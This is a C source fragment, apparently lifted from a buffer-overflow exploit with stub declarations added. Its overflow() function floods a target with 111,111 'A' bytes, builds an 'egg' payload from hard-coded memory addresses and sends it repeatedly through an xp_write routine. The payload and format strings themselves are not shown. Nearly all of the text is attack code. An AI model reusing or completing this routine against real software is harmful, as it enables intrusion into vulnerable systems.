
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* argument ;
 char* argumentx ;
 char* egg (int,int) ;
 scalar_t__ malloc (int) ;
 int memset (char*,char,int) ;
 int sprintf (char*,char*,char*) ;
 char* str ;
 char* trash ;
 int xp_write (char*) ;

void overflow()
{
    char *data, *dptr, *buf, *bufp, *eg, *arg, *aptr;
 int i;
 data = (char *)malloc(111111);
 dptr = data;
 buf = (char *)malloc(111111+20);
 bufp = buf;
 arg = (char *)malloc(1500);
 aptr = arg;


 memset(dptr, '\x41', 111111);
 sprintf(bufp, argumentx, data);
 xp_write(bufp);

 eg = egg(0x80d2b4a, 0x080cda20);
 sprintf(aptr, argument, eg);

 for (i=0 ; i<50; i++)
 xp_write(aptr);

 xp_write(str);
 xp_write(trash);
}
